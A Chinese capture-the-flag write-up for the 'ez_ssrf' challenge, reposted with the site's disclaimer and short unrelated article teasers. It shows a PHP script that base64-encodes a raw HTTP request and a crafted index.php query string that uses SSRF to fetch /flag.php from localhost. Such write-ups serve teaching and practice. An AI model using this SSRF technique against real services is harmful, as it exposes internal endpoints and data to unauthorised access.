NSS [HNCTF 2022 WEEK2]ez_ssrf

news2024/11/25 8:18:51

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data，host为127.0.0.1，port为80

传参：/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/718940.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

2023年7月3日，网络关键设备和网络安全专用产品目录（一级）终于更新了，增加到38类，大家想了解每类产品对应哪家检测机构、以及涉及相关的标准、分解的二级产品目录，可以联系龙域认证客服。一、网络关键设备…

面向对象的设计原则参考资料： 视频书籍《设计模式：可复用面向对象软件的基础》简介面对复杂问题如何解决？ 分解：分而治之，大问题分解成小问题。抽象：忽视非本质的细节，处理泛化和理想化…

$交换排序--冒泡排序和快速排序$